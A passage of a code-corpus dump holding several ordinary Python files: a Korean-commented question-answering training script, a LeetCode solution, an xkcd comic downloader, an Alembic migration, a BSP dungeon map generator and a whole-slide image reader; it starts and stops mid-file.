T2211_dev\r\n\r\n training_args.report_to = [\"wandb\"]\r\n training_args.run_name = model_args.model_name_or_path # 프로젝트 내 모델 run 이름 ex) [ㅇㅇㅇ]klue/roberta-base\r\n\r\n print(f'====================================')\r\n print(training_args)\r\n print(f'====================================')\r\n\r\n print(f\"model is from {model_args.model_name_or_path}\")\r\n print(f\"data is from {data_args.dataset_name}\")\r\n\r\n # logging 설정\r\n logging.basicConfig(\r\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\r\n datefmt=\"%m/%d/%Y %H:%M:%S\",\r\n handlers=[logging.StreamHandler(sys.stdout)],\r\n )\r\n\r\n # verbosity 설정 : Transformers logger의 정보로 사용합니다 (on main process only)\r\n logger.info(\"Training/evaluation parameters %s\", training_args)\r\n\r\n # 모델을 초기화하기 전에 난수를 고정합니다.\r\n set_seed(training_args.seed)\r\n\r\n datasets = load_from_disk(data_args.dataset_name)\r\n print(datasets)\r\n\r\n # AutoConfig를 이용하여 pretrained model 과 tokenizer를 불러옵니다.\r\n # argument로 원하는 모델 이름을 설정하면 옵션을 바꿀 수 있습니다.\r\n\r\n tokenizer = AutoTokenizer.from_pretrained(\r\n model_args.tokenizer_name\r\n if model_args.tokenizer_name is not None\r\n else model_args.model_name_or_path,\r\n # 'use_fast' argument를 True로 설정할 경우 rust로 구현된 tokenizer를 사용할 수 있습니다.\r\n # False로 설정할 경우 python으로 구현된 tokenizer를 사용할 수 있으며,\r\n # rust version이 비교적 속도가 빠릅니다.\r\n use_fast=True,\r\n )\r\n\r\n if model_args.model_type == 'default':\r\n config = AutoConfig.from_pretrained(\r\n model_args.config_name\r\n if model_args.config_name is not None\r\n else model_args.model_name_or_path,\r\n )\r\n\r\n model = AutoModelForQuestionAnswering.from_pretrained(\r\n model_args.model_name_or_path,\r\n from_tf=bool(\".ckpt\" in model_args.model_name_or_path),\r\n config=config,\r\n )\r\n elif model_args.model_type == 'custom':\r\n model = custom_model.CustomModelForQuestionAnswering() # conv-based custom model\r\n else:\r\n raise ValueError('[ Model Type Not Found ] 해당하는 모델 유형이 없습니다.')\r\n\r\n print(\r\n type(training_args),\r\n type(model_args),\r\n type(datasets),\r\n type(tokenizer),\r\n type(model),\r\n )\r\n\r\n # do_train mrc model 혹은 do_eval mrc model\r\n if training_args.do_train or training_args.do_eval:\r\n run_mrc(data_args, training_args, model_args, datasets, tokenizer, model)\r\n \r\n wandb.finish()\r\n\r\n\r\ndef run_mrc(\r\n data_args: DataTrainingArguments,\r\n training_args: TrainingArguments,\r\n model_args: ModelArguments,\r\n datasets: DatasetDict,\r\n tokenizer,\r\n model,\r\n)-> NoReturn:\r\n \"\"\"\r\n Perform Machine Reading Comprehension(MRC) task\r\n \r\n Args:\r\n data_args (:obj:`DataTrainingArguments`):\r\n Arguments pertaining to what data we are going to input our model for training and eval.\r\n \r\n training_args (:obj:`TrainingArguments`):\r\n Arguments we use in our example scripts which relate to the training loop itself.\r\n \r\n model_args (:obj:`ModelArguments`):\r\n Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.\r\n\r\n datasets (:obj:`DatasetDict`):\r\n train-valid dataset\r\n\r\n tokenizer (:obj:`AutoTokenizer.from_pretrained`):\r\n tokenizer classes of the pretrained model vocabulary.\r\n\r\n model (:obj:`AutoModelForQuestionAnswering.from_pretrained`):\r\n model classes of the question answering from a pretrained model.\r\n\r\n \"\"\"\r\n # dataset을 전처리합니다.\r\n # training과 evaluation에서 사용되는 전처리는 아주 조금 다른 형태를 가집니다.\r\n if training_args.do_train:\r\n column_names = datasets[\"train\"].column_names\r\n else:\r\n column_names = 
datasets[\"validation\"].column_names\r\n\r\n question_column_name = \"question\" if \"question\" in column_names else column_names[0]\r\n context_column_name = \"context\" if \"context\" in column_names else column_names[1]\r\n answer_column_name = \"answers\" if \"answers\" in column_names else column_names[2]\r\n\r\n # Padding에 대한 옵션을 설정합니다.\r\n # (question|context) 혹은 (context|question)로 세팅 가능합니다.\r\n pad_on_right = tokenizer.padding_side == \"right\"\r\n\r\n # 오류가 있는지 확인합니다.\r\n last_checkpoint, max_seq_length = check_no_error(\r\n data_args, training_args, datasets, tokenizer\r\n )\r\n\r\n # Train preprocessing / 전처리를 진행합니다.\r\n def prepare_train_features(examples):\r\n \"\"\"\r\n preprocessing data for training\r\n\r\n Args:\r\n examples (:obj:`DatasetDict`):\r\n train data to be preprocessed\r\n\r\n Returns:\r\n tokenized_examples(:obj:`DatasetDict`):\r\n preprocessed train data\r\n \"\"\"\r\n # truncation과 padding(length가 짧을때만)을 통해 toknization을 진행하며, stride를 이용하여 overflow를 유지합니다.\r\n # 각 example들은 이전의 context와 조금씩 겹치게됩니다.\r\n tokenized_examples = tokenizer(\r\n examples[question_column_name if pad_on_right else context_column_name],\r\n examples[context_column_name if pad_on_right else question_column_name],\r\n truncation=\"only_second\" if pad_on_right else \"only_first\",\r\n max_length=max_seq_length,\r\n stride=data_args.doc_stride,\r\n return_overflowing_tokens=True,\r\n return_offsets_mapping=True,\r\n #return_token_type_ids=False, # roberta모델을 사용할 경우 False, bert를 사용할 경우 True로 표기해야합니다.\r\n padding=\"max_length\" if data_args.pad_to_max_length else False,\r\n )\r\n\r\n # 길이가 긴 context가 등장할 경우 truncate를 진행해야하므로, 해당 데이터셋을 찾을 수 있도록 mapping 가능한 값이 필요합니다.\r\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\r\n # token의 캐릭터 단위 position를 찾을 수 있도록 offset mapping을 사용합니다.\r\n # start_positions과 end_positions을 찾는데 도움을 줄 수 있습니다.\r\n offset_mapping = tokenized_examples.pop(\"offset_mapping\")\r\n\r\n # 데이터셋에 \"start position\", \"enc position\" label을 부여합니다.\r\n tokenized_examples[\"start_positions\"] = []\r\n tokenized_examples[\"end_positions\"] = []\r\n\r\n for i, offsets in enumerate(offset_mapping):\r\n input_ids = tokenized_examples[\"input_ids\"][i]\r\n cls_index = input_ids.index(tokenizer.cls_token_id) # cls index\r\n\r\n # sequence id를 설정합니다 (to know what is the context and what is the question).\r\n sequence_ids = tokenized_examples.sequence_ids(i)\r\n\r\n # 하나의 example이 여러개의 span을 가질 수 있습니다.\r\n sample_index = sample_mapping[i]\r\n answers = examples[answer_column_name][sample_index]\r\n\r\n # answer가 없을 경우 cls_index를 answer로 설정합니다(== example에서 정답이 없는 경우 존재할 수 있음).\r\n if len(answers[\"answer_start\"]) == 0:\r\n tokenized_examples[\"start_positions\"].append(cls_index)\r\n tokenized_examples[\"end_positions\"].append(cls_index)\r\n else:\r\n # text에서 정답의 Start/end character index\r\n start_char = answers[\"answer_start\"][0]\r\n end_char = start_char + len(answers[\"text\"][0])\r\n\r\n # text에서 current span의 Start token index\r\n token_start_index = 0\r\n while sequence_ids[token_start_index] != (1 if pad_on_right else 0):\r\n token_start_index += 1\r\n\r\n # text에서 current span의 End token index\r\n token_end_index = len(input_ids) - 1\r\n while sequence_ids[token_end_index] != (1 if pad_on_right else 0):\r\n token_end_index -= 1\r\n\r\n # 정답이 span을 벗어났는지 확인합니다(정답이 없는 경우 CLS index로 label되어있음).\r\n if not (\r\n offsets[token_start_index][0] <= start_char\r\n and offsets[token_end_index][1] >= end_char\r\n ):\r\n 
tokenized_examples[\"start_positions\"].append(cls_index)\r\n tokenized_examples[\"end_positions\"].append(cls_index)\r\n else:\r\n # token_start_index 및 token_end_index를 answer의 끝으로 이동합니다.\r\n # Note: answer가 마지막 단어인 경우 last offset을 따라갈 수 있습니다(edge case).\r\n while (\r\n token_start_index < len(offsets)\r\n and offsets[token_start_index][0] <= start_char\r\n ):\r\n token_start_index += 1\r\n tokenized_examples[\"start_positions\"].append(token_start_index - 1)\r\n while offsets[token_end_index][1] >= end_char:\r\n token_end_index -= 1\r\n tokenized_examples[\"end_positions\"].append(token_end_index + 1)\r\n\r\n return tokenized_examples\r\n\r\n if training_args.do_train:\r\n if \"train\" not in datasets:\r\n raise ValueError(\"--do_train requires a train dataset\")\r\n train_dataset = datasets[\"train\"]\r\n\r\n # dataset에서 train feature를 생성합니다.\r\n train_dataset = train_dataset.map(\r\n prepare_train_features,\r\n batched=True,\r\n num_proc=data_args.preprocessing_num_workers,\r\n remove_columns=column_names,\r\n load_from_cache_file=not data_args.overwrite_cache,\r\n )\r\n\r\n # Validation preprocessing\r\n def prepare_validation_features(examples):\r\n \"\"\"\r\n preprocessing data for validation\r\n\r\n Args:\r\n examples (:obj:`DatasetDict`):\r\n validation data to be preprocessed\r\n\r\n Returns:\r\n tokenized_examples(:obj:`DatasetDict`):\r\n preprocessed validation data\r\n \"\"\"\r\n # truncation과 padding(length가 짧을때만)을 통해 toknization을 진행하며, stride를 이용하여 overflow를 유지합니다.\r\n # 각 example들은 이전의 context와 조금씩 겹치게됩니다.\r\n tokenized_examples = tokenizer(\r\n examples[question_column_name if pad_on_right else context_column_name],\r\n examples[context_column_name if pad_on_right else question_column_name],\r\n truncation=\"only_second\" if pad_on_right else \"only_first\",\r\n max_length=max_seq_length,\r\n stride=data_args.doc_stride,\r\n return_overflowing_tokens=True,\r\n return_offsets_mapping=True,\r\n #return_token_type_ids=False, # roberta모델을 사용할 경우 False, bert를 사용할 경우 True로 표기해야합니다.\r\n padding=\"max_length\" if data_args.pad_to_max_length else False,\r\n )\r\n\r\n # 길이가 긴 context가 등장할 경우 truncate를 진행해야하므로, 해당 데이터셋을 찾을 수 있도록 mapping 가��한 값이 필요합니다.\r\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\r\n\r\n # evaluation을 위해, prediction을 context의 substring으로 변환해야합니다.\r\n # corresponding example_id를 유지하고 offset mappings을 저장해야합니다.\r\n tokenized_examples[\"example_id\"] = []\r\n\r\n for i in range(len(tokenized_examples[\"input_ids\"])):\r\n # sequence id를 설정합니다 (to know what is the context and what is the question).\r\n sequence_ids = tokenized_examples.sequence_ids(i)\r\n context_index = 1 if pad_on_right else 0\r\n\r\n # 하나의 example이 여러개의 span을 가질 수 있습니다.\r\n sample_index = sample_mapping[i]\r\n tokenized_examples[\"example_id\"].append(examples[\"id\"][sample_index])\r\n\r\n # Set to None the offset_mapping을 None으로 설정해서 token position이 context의 일부인지 쉽게 판별 할 수 있습니다.\r\n tokenized_examples[\"offset_mapping\"][i] = [\r\n (o if sequence_ids[k] == context_index else None)\r\n for k, o in enumerate(tokenized_examples[\"offset_mapping\"][i])\r\n ]\r\n return tokenized_examples\r\n\r\n if training_args.do_eval:\r\n eval_dataset = datasets[\"validation\"]\r\n\r\n # Validation Feature 생성\r\n eval_dataset = eval_dataset.map(\r\n prepare_validation_features,\r\n batched=True,\r\n num_proc=data_args.preprocessing_num_workers,\r\n remove_columns=column_names,\r\n load_from_cache_file=not data_args.overwrite_cache,\r\n )\r\n\r\n # Data collator\r\n # flag가 True이면 이미 max 
length로 padding된 상태입니다.\r\n # 그렇지 않다면 data collator에서 padding을 진행해야합니다.\r\n data_collator = DataCollatorWithPadding(\r\n tokenizer, pad_to_multiple_of=8 if training_args.fp16 else None\r\n )\r\n\r\n # Post-processing:\r\n def post_processing_function(examples, features, predictions, training_args):\r\n \"\"\"\r\n Post-processes the prediction value of the qa model\r\n\r\n Args:\r\n examples (:obj:`DatasetDict`):\r\n data to be post-processing\r\n\r\n features ([type]): [description]\r\n\r\n predictions (:obj:`Tuple[np.ndarray, np.ndarray]`):\r\n model prediction value\r\n two arrays representing start logits and the end logits\r\n \r\n training_args (:obj:`TrainingArguments`):\r\n Arguments we use in our example scripts which relate to the training loop itself.\r\n\r\n Returns:\r\n EvalPrediction :\r\n post-processed the prediction value of the qa model\r\n \"\"\"\r\n # Post-processing: start logits과 end logits을 original context의 정답과 match시킵니다.\r\n predictions = postprocess_qa_predictions(\r\n examples=examples,\r\n features=features,\r\n predictions=predictions,\r\n max_answer_length=data_args.max_answer_length,\r\n output_dir=training_args.output_dir,\r\n )\r\n # Metric을 구할 수 있도록 Format을 맞춰줍니다.\r\n formatted_predictions = [\r\n {\"id\": k, \"prediction_text\": v} for k, v in predictions.items()\r\n ]\r\n if training_args.do_predict:\r\n return formatted_predictions\r\n\r\n elif training_args.do_eval:\r\n references = [\r\n {\"id\": ex[\"id\"], \"answers\": ex[answer_column_name]}\r\n for ex in datasets[\"validation\"]\r\n ]\r\n return EvalPrediction(\r\n predictions=formatted_predictions, label_ids=references\r\n )\r\n\r\n metric = load_metric(\"squad\")\r\n\r\n def compute_metrics(p: EvalPrediction):\r\n \"\"\"\r\n Compute the metrics\r\n\r\n Args:\r\n p (:obj:`EvalPrediction`):\r\n prediction value\r\n\r\n Returns:\r\n metric\r\n \"\"\"\r\n return metric.compute(predictions=p.predictions, references=p.label_ids)\r\n\r\n # Trainer 초기화\r\n trainer = QuestionAnsweringTrainer( \r\n model=model,\r\n args=training_args,\r\n train_dataset=train_dataset if training_args.do_train else None,\r\n eval_dataset=eval_dataset if training_args.do_eval else None,\r\n eval_examples=datasets[\"validation\"] if training_args.do_eval else None,\r\n tokenizer=tokenizer,\r\n data_collator=data_collator,\r\n post_process_function=post_processing_function,\r\n compute_metrics=compute_metrics,\r\n )\r\n\r\n # Training\r\n if training_args.do_train:\r\n if last_checkpoint is not None:\r\n checkpoint = last_checkpoint\r\n elif os.path.isdir(model_args.model_name_or_path):\r\n checkpoint = model_args.model_name_or_path\r\n else:\r\n checkpoint = None\r\n train_result = trainer.train(resume_from_checkpoint=checkpoint)\r\n trainer.save_model(model_args.best_model) # Saves the tokenizer too for easy upload\r\n\r\n metrics = train_result.metrics\r\n metrics[\"train_samples\"] = len(train_dataset)\r\n\r\n trainer.log_metrics(\"train\", metrics)\r\n trainer.save_metrics(\"train\", metrics)\r\n trainer.save_state()\r\n\r\n output_train_file = os.path.join(training_args.output_dir, \"train_results.txt\")\r\n\r\n with open(output_train_file, \"w\") as writer:\r\n logger.info(\"***** Train results *****\")\r\n for key, value in sorted(train_result.metrics.items()):\r\n logger.info(f\" {key} = {value}\")\r\n writer.write(f\"{key} = {value}\\n\")\r\n\r\n # State 저장\r\n trainer.state.save_to_json(\r\n os.path.join(training_args.output_dir, \"trainer_state.json\")\r\n )\r\n\r\n # Evaluation\r\n if training_args.do_eval:\r\n 
logger.info(\"*** Evaluate ***\")\r\n metrics = trainer.evaluate()\r\n\r\n metrics[\"eval_samples\"] = len(eval_dataset)\r\n\r\n trainer.log_metrics(\"eval\", metrics)\r\n trainer.save_metrics(\"eval\", metrics)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":19750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"412814990","text":"'''\n162. Find Peak Element\n这题要求我们在一个无序的数组里面找到一个peak元素, 所谓peak, 就是值比两边邻居大就行了。\n对于这题, 最简单地解法就是遍历数组, 只要找到第一个元素, 大于两边就可以了, 复杂度为O(N)。 但这\n题还可以通过二分来做\n'''\nclass Solution(object):\n def findPeakElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return \n idx = 0\n m = nums[0]\n for i in range(len(nums)):\n if nums[i]>m:\n m=nums[i]\n idx = i\n return idx\n\n\na = Solution()\nnums = [1,3,2,1,6]\nprint(a.findPeakElement(nums))","sub_path":"162.py","file_name":"162.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"80404497","text":"#!/usr/bin/env python3\n\nimport requests,sys,re\nfrom bs4 import BeautifulSoup\nimport time\nfrom datetime import datetime\nfrom urllib.request import urlopen\nnow = time.time()\nimport string\n\nprint('downloading xkcd comics ..')\nprint(\"time started: \",datetime.now())\n\nfor i in range(1,1658):\n # 404: not found and 1525 is not an image\n if i in [404,1525]:\n continue\n else:\n res = requests.get('http://xkcd.com/'+str(i)+'/')\n soup = BeautifulSoup(res.text)\n imageToken = soup.find_all('img')\n name = (imageToken[1].get('alt'))\n if name==None:\n name = ''.join(['dude',str(i)])\n raw = imageToken[1].get('src')\n raw = raw.strip('/')\n extension = raw.split('.')\n extension = extension[-1]\n if 'style' in name:\n pat = re.compile(r'>(.*)(.*)')\n sp = list(pat.search(name).groups())\n \n else:\n if '/' in name:\n sp = name.split('/')\n else:\n sp = name.split()\n\n name = \"\".join(str(x) for x in sp if x not in string.punctuation)\n filename = ''.join([name,'.',extension])\n \n \n pic_url ='http://'+raw\n pic = requests.get(pic_url,stream=True)\n\n with open(filename, 'wb') as fd:\n for chunk in pic.iter_content(1024):\n fd.write(chunk)\n \n #with open(filename, \"wb\" ) as f:\n # f.write(pic)\n\n print(''.join(['download completed ','xkcd comics ',str(i)]))\n\nthen = time.time()\nprint(\"time finished: \",datetime.now())\nprint(\"total time taken: \",then-now)\n","sub_path":"xkcdOriginalName.py","file_name":"xkcdOriginalName.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"590260115","text":"from dateutil import tz\n\n\nclass Message:\n def __init__(self, content, time):\n from_zone = tz.tzutc()\n\n self.content = content\n self.time = time.replace(tzinfo=from_zone)\n\n def __repr__(self):\n to_zone = tz.tzlocal()\n time = self.time.astimezone(to_zone)\n time = str(time.strftime('%H:%M'))\n content = str(self.content.encode(\"utf-8\"))\n return content + \" @ \" + time\n","sub_path":"util/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"75689376","text":"\"\"\"empty message\n\nRevision ID: b0855cbee4df\nRevises: 78d48ff15544\nCreate Date: 2016-09-06 10:37:56.254308\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'b0855cbee4df'\ndown_revision = '78d48ff15544'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('calendar_entries')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('calendar_entries',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('google_cal_id', sa.INTEGER(), nullable=False),\n sa.Column('google_cal_entry_link', sa.VARCHAR(length=200), nullable=False),\n sa.Column('note_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['note_id'], ['notes.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('google_cal_entry_link')\n )\n ### end Alembic commands ###\n","sub_path":"migrations/versions/b0855cbee4df_.py","file_name":"b0855cbee4df_.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"152361072","text":"from collections import deque\n\nfrom .geometry import Rectangle\nfrom .map import Map\n\nclass BSPNode(Rectangle):\n\n def __init__(self, x, y, width, height):\n\n super().__init__(x, y, width, height)\n\n self.left = 0\n self.right = 0\n self.room = 0\n\nclass BSPMapGenerator(Map):\n\n def __init__(self, width=100, height=100, rng=0):\n\n super().__init__(width, height, rng)\n\n self.hall_width = 2\n self.max_space_size = 45\n self.min_space_size = 20\n self.min_room_size = 10\n\n self.tree = 0\n self.spaces = 0\n self.halls = []\n\n def set_hall_width(self, width):\n\n self.hall_width = width + (width % 2)\n\n def set_max_space_size(self, size):\n\n self.max_space_size = size\n\n def set_min_space_size(self, size):\n\n self.min_space_size = size\n\n def set_min_room_size(self, size):\n\n self.min_room_size = size\n\n def carve_map(self):\n\n for i in range(len(self.spaces)):\n left = self.spaces[i].room.position.x\n top = self.spaces[i].room.position.y\n width = self.spaces[i].room.width\n height = self.spaces[i].room.height\n\n self.carve(left, top, width, height)\n\n for i in range(len(self.halls)): \n left = self.halls[i].position.x\n top = self.halls[i].position.y\n width = self.halls[i].width\n height = self.halls[i].height\n\n self.carve(left, top, width, height)\n\n def connect_rooms(self):\n nodes = self.tree_branches(self.tree)\n\n for i in range(len(nodes)):\n room1 = self.find_room(nodes[i].left)\n room2 = self.find_room(nodes[i].right)\n\n self.halls += self.create_hall(room1, room2, self.hall_width)\n\n def create_rooms(self):\n\n for i in range(len(self.spaces)):\n space = self.spaces[i]\n w = self.rng.random_range(self.min_room_size, space.width - 2)\n h = self.rng.random_range(self.min_room_size, space.height - 2)\n x = self.rng.random_range(1, space.width - w - 1)\n y = self.rng.random_range(1, space.height - h - 1)\n\n space.room = Rectangle(\n space.position.x + x, \n space.position.y + y,\n w, \n h\n )\n\n def find_room(self, node):\n\n if node.room != 0:\n return node.room\n\n if self.rng.random() < 0.5:\n return self.find_room(node.left)\n\n return self.find_room(node.right)\n\n def generate(self):\n\n self.partition_space()\n self.create_rooms()\n self.connect_rooms()\n self.carve_map()\n\n return self.map\n\n def partition_space(self):\n\n self.tree = BSPNode(0, 0, self.width, self.height)\n\n toSplit = deque([self.tree])\n\n while len(toSplit) > 0:\n node = toSplit.popleft()\n\n if (node.width > self.max_space_size\n or node.height > self.max_space_size\n or self.rng.random() < 0.75\n ):\n if self.split(node):\n toSplit.append(node.left)\n toSplit.append(node.right)\n\n self.spaces = self.tree_leafs(self.tree)\n\n def split(self, node):\n\n if node.left != 0 or node.right != 0:\n return False\n\n split_h = self.rng.random() < 0.5\n if node.width > node.height and node.width / node.height >= 1.25:\n split_h = False\n elif node.height > node.width and node.height / node.width >= 1.25:\n split_h = True\n\n max_split = (\n (node.height if split_h else node.width)\n - self.min_space_size\n )\n\n if max_split < self.min_space_size:\n return False\n\n split_position = self.rng.random_range(self.min_space_size, max_split)\n if split_h:\n node.left = BSPNode(\n node.position.x,\n node.position.y,\n node.width,\n split_position\n )\n\n node.right = BSPNode(\n node.position.x,\n node.position.y + split_position,\n node.width,\n node.height - split_position\n )\n else:\n node.left = BSPNode(\n node.position.x,\n node.position.y,\n 
split_position,\n node.height\n )\n\n node.right = BSPNode(\n node.position.x + split_position,\n node.position.y,\n node.width - split_position,\n node.height\n )\n\n return True\n\n def tree_branches(self, node):\n\n if node.left == 0 and node.right == 0:\n return []\n\n return (\n [node]\n + self.tree_branches(node.left)\n + self.tree_branches(node.right)\n )\n\n def tree_leafs(self, node):\n\n if node.left == 0 and node.right == 0:\n return [node]\n\n return self.tree_leafs(node.left) + self.tree_leafs(node.right)","sub_path":"RoguePython/maps/bspmap.py","file_name":"bspmap.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"181756195","text":"\"\"\"WSIReader for WSI reading or extracting metadata information from WSIs\"\"\"\nfrom tiatoolbox.utils import misc\nfrom tiatoolbox.utils.transforms import background_composite\n\nimport pathlib\nimport numpy as np\nimport openslide\nimport math\nimport pandas as pd\n\n\nclass WSIReader:\n \"\"\"WSI Reader class to read WSI images\n\n Attributes:\n input_dir (pathlib.Path): input path to WSI directory\n file_name (str): file name of the WSI\n output_dir (pathlib.Path): output directory to save the output\n openslide_obj (:obj:`openslide.OpenSlide`)\n tile_objective_value (int): objective value at which tile is generated\n tile_read_size (int): [tile width, tile height]\n objective_power (int): objective value at which whole slide image is scanned\n level_count (int): The number of pyramid levels in the slide\n level_dimensions (int): A list of `(width, height)` tuples, one for each level\n of the slide\n level_downsamples (int): A list of down sample factors for each level\n of the slide\n\n \"\"\"\n\n def __init__(\n self,\n input_dir=\".\",\n file_name=None,\n output_dir=\"./output\",\n tile_objective_value=20,\n tile_read_size_w=5000,\n tile_read_size_h=5000,\n ):\n \"\"\"\n Args:\n input_dir (str, pathlib.Path): input path to WSI directory\n file_name (str): file name of the WSI\n output_dir (str, pathlib.Path): output directory to save the output,\n default=./output\n tile_objective_value (int): objective value at which tile is generated,\n default=20\n tile_read_size_w (int): tile width, default=5000\n tile_read_size_h (int): tile height, default=5000\n\n \"\"\"\n\n self.input_dir = pathlib.Path(input_dir)\n self.file_name = pathlib.Path(file_name).name\n if output_dir is not None:\n self.output_dir = pathlib.Path(output_dir, self.file_name)\n\n self.openslide_obj = openslide.OpenSlide(\n filename=str(pathlib.Path(self.input_dir, self.file_name))\n )\n self.tile_objective_value = np.int(tile_objective_value) # Tile magnification\n self.tile_read_size = np.array([tile_read_size_w, tile_read_size_h])\n self.objective_power = np.int(\n self.openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n ) # magnification at which slide is scanned, this is magnification at level 0\n self.level_count = self.openslide_obj.level_count\n self.level_dimensions = self.openslide_obj.level_dimensions\n self.level_downsamples = self.openslide_obj.level_downsamples\n\n def slide_info(self):\n \"\"\"WSI meta data reader\n\n Args:\n self (WSIReader):\n\n Returns:\n dict: dictionary containing meta information\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... 
file_name=\"CMU-1.ndpi\")\n >>> slide_param = wsi_obj.slide_info()\n\n \"\"\"\n input_dir = self.input_dir\n if self.objective_power == 0:\n self.objective_power = np.int(\n self.openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n )\n objective_power = self.objective_power\n slide_dimension = self.openslide_obj.level_dimensions[0]\n tile_objective_value = self.tile_objective_value\n rescale = np.int(objective_power / tile_objective_value)\n filename = self.file_name\n tile_read_size = self.tile_read_size\n level_count = self.level_count\n level_dimensions = self.level_dimensions\n level_downsamples = self.level_downsamples\n file_name = self.file_name\n\n param = {\n \"input_dir\": input_dir,\n \"objective_power\": objective_power,\n \"slide_dimension\": slide_dimension,\n \"rescale\": rescale,\n \"tile_objective_value\": tile_objective_value,\n \"filename\": filename,\n \"tile_read_size\": tile_read_size.tolist(),\n \"level_count\": level_count,\n \"level_dimensions\": level_dimensions,\n \"level_downsamples\": level_downsamples,\n \"file_name\": file_name,\n }\n\n return param\n\n def read_region(self, start_w, start_h, end_w, end_h, level=0):\n \"\"\"Read a region in whole slide image\n\n Args:\n start_w (int): starting point in x-direction (along width)\n start_h (int): starting point in y-direction (along height)\n end_w (int): end point in x-direction (along width)\n end_h (int): end point in y-direction (along height)\n level (int): pyramid level to read the image\n\n Returns:\n img_array : ndarray of size MxNx3\n M=end_h-start_h, N=end_w-start_w\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> from matplotlib import pyplot as plt\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\")\n >>> level = 0\n >>> region = [13000, 17000, 15000, 19000]\n >>> im_region = wsi_obj.read_region(\n ... region[0], region[1], region[2], region[3], level)\n >>> plt.imshow(im_region)\n\n \"\"\"\n openslide_obj = self.openslide_obj\n im_region = openslide_obj.read_region(\n [start_w, start_h], level, [end_w - start_w, end_h - start_h]\n )\n im_region = background_composite(image=im_region)\n return im_region\n\n def slide_thumbnail(self):\n \"\"\"Read whole slide image thumbnail at 1.5x\n\n Args:\n self (WSIReader):\n\n Returns:\n ndarray : image array\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\")\n >>> slide_thumbnail = wsi_obj.slide_thumbnail()\n\n \"\"\"\n openslide_obj = self.openslide_obj\n tile_objective_value = 20\n\n if self.objective_power == 0:\n self.objective_power = np.int(\n openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n )\n\n rescale = np.int(self.objective_power / tile_objective_value)\n slide_dimension = openslide_obj.level_dimensions[0]\n slide_dimension_20x = np.array(slide_dimension) / rescale\n thumb = openslide_obj.get_thumbnail(\n (int(slide_dimension_20x[0] / 16), int(slide_dimension_20x[1] / 16))\n )\n thumb = np.asarray(thumb)\n\n return thumb\n\n def save_tiles(self, tile_format=\".jpg\"):\n \"\"\"Generate JPEG tiles from whole slide images\n\n Args:\n self (WSIReader):\n tile_format (str): file format to save image tiles, default=\".jpg\"\n\n Returns:\n saves tiles in the output directory output_dir\n\n Examples:\n >>> from tiatoolbox.dataloader import wsireader\n >>> wsi_obj = wsireader.WSIReader(input_dir=\"./\",\n ... file_name=\"CMU-1.ndpi\",\n ... output_dir='./dev_test',\n ... 
tile_objective_value=10,\n ... tile_read_size_h=2000,\n ... tile_read_size_w=2000)\n >>> wsi_obj.save_tiles()\n\n \"\"\"\n openslide_obj = self.openslide_obj\n tile_objective_value = self.tile_objective_value\n tile_read_size = self.tile_read_size\n\n if self.objective_power == 0:\n self.objective_power = np.int(\n openslide_obj.properties[openslide.PROPERTY_NAME_OBJECTIVE_POWER]\n )\n\n rescale = np.int(self.objective_power / tile_objective_value)\n tile_read_size = np.multiply(tile_read_size, rescale)\n slide_dimension = openslide_obj.level_dimensions[0]\n slide_h = slide_dimension[1]\n slide_w = slide_dimension[0]\n tile_h = tile_read_size[0]\n tile_w = tile_read_size[1]\n\n iter_tot = 0\n output_dir = pathlib.Path(self.output_dir)\n output_dir.mkdir(parents=True)\n data = []\n\n for h in range(int(math.ceil((slide_h - tile_h) / tile_h + 1))):\n for w in range(int(math.ceil((slide_w - tile_w) / tile_w + 1))):\n start_h = h * tile_h\n end_h = (h * tile_h) + tile_h\n start_w = w * tile_w\n end_w = (w * tile_w) + tile_w\n if end_h > slide_h:\n end_h = slide_h\n\n if end_w > slide_w:\n end_w = slide_w\n\n # Read image region\n im = self.read_region(start_w, start_h, end_w, end_h)\n format_str = (\n \"Tile%d: start_w:%d, end_w:%d, \"\n \"start_h:%d, end_h:%d, \"\n \"width:%d, height:%d\"\n )\n\n print(\n format_str\n % (\n iter_tot,\n start_w,\n end_w,\n start_h,\n end_h,\n end_w - start_w,\n end_h - start_h,\n ),\n flush=True,\n )\n\n # Rescale to the correct 